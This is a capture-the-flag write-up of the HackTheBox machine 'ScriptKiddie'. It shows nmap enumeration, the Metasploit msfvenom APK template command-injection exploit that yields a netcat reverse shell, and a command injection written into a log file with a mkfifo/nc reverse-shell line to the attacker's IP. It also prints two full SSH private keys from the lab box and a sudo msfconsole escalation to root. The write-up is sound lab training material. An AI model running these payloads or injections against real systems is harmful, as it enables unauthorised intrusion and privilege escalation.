Welcome to the ScriptKiddie writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k


ScriptKiddie

tags: HTB Easy Linux
Platform: Hackthebox
Difficult: Easy
S.O.: Linux

Enumeration

Nmap

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
|_http-title: k1d'5 h4ck3r t00l5

In the port enumeration we find that port 5000 is a python web server from which we can run scanners with nmap, generate payloads with msfvenom and search for known exploits with searchsploit.

Exploitation

There is a vulnerability for msfvenom found in metasploit unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection.

# msfconsole
msf6 > search msfvenom

Matching Modules
================

   #  Name                                                                    Disclosure Date  Rank       Check  Description
   -  ----                                                                    ---------------  ----       -----  -----------
   0  exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection  2020-10-29       excellent  No     Rapid7 Metasploit Framework msfvenom APK Template Command Injection

Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection

msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/reverse_netcat

msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set lhost 10.10.15.13
lhost => 10.10.15.13
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > run

[+] msf.apk stored at /root/.msf4/local/msf.apk

To obtain a reverse shell using the web section to generate payloads, we only need to set os as Android, a valid IP in lhost and import the file that has been generated by metasploit having a terminal listening on the chosen port at when creating the apk with metasploit.

# nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.15.13] from (UNKNOWN) [10.10.10.226] 34124
id
uid=1000(kid) gid=1000(kid) groups=1000(kid)

Post exploitation

The first thing we can do is try to get SSH because port 22 is open.

cd /home/kid/.ssh
ls
authorized_keys
id_rsa
id_rsa.pub
cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

Perfect, now we just have to save the rsa key and connect via SSH as kid.
Once we have connected, we find the flag user.txt in the user's home directory

Privilege escalation 1

Inside the user's home there is a directory called logs that contains a empty file called hackers.
On the other hand, in the home directory we can see that there is another user called pwn who has a script in his directory called scanlosers.sh on which we have read permissions.

#!/bin/bash

log=/home/kid/logs/hackers

cd / home / pwn /
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

As we can see, the script gets the data from the hackers file, processes it and clear its content. Therefore, we should be able to concatenate commands by typing what we want to execute inside the hackers file, but for this, we need the user pwn to execute the script so, we are going to execute pspy to see if it is being executed periodically .

2021/02/07 20:10:44 CMD: UID=1001 PID=4651   | /bin/bash /home/pwn/scanlosers.sh
2021/02/07 20:10:44 CMD: UID=1001 PID=4648   | nmap --top-ports 10 -oN recon/test.nmap test
2021/02/07 20:10:44 CMD: UID=1001 PID=4647   | sh -c nmap --top-ports 10 -oN recon/test.nmap test 2>&1 >/dev/null
2021/02/07 20:10:44 CMD: UID=1001 PID=4655   | /bin/bash /home/pwn/scanlosers.sh

Perfect, the user 1001 (pwn) is executing the script /home/pwn/scanlosers.sh and therefore it will execute everything we include in thehackers file.

Doing some tests I have seen that the user pwn executes the script every time thehackers file is modified, so we are going to put a terminal to listen and try to inject a reverse shell.

echo "; touch /tmp/f; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.15.13 4445 > /tmp/f #" > /home/kid/logs/hackers
# nc -lnvp 4445
listening on [any] 4445 ...
connect to [10.10.15.13] from (UNKNOWN) [10.10.10.226] 39446
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1001(pwn) gid=1001(pwn) groups=1001(pwn)
$

Nice, we are in as pwn.

And again, we extract its id_rsa to connect by SSH.

$ cat .ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

Privilege escalation 2

By listing the commands that we can do with sudo, we see that we can execute metasploit as root without password.

[email protected]:~$ sudo -l
Matching Defaults entries for pwn on scriptkiddie:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pwn may run the following commands on scriptkiddie:
    (root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole

As we know, from the metasploit console we can execute any system command, so we would be executing the commands directly as root.

[email protected]:~$ sudo /opt/metasploit-framework-6.0.9/msfconsole
msf6 > id
[*] exec: id

uid=0(root) gid=0(root) groups=0(root)

msf6 > /bin/bash -i
[*] exec: /bin/bash -i

[email protected]:/home/pwn# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:/home/pwn#

Now we own the system and the root.txt flag.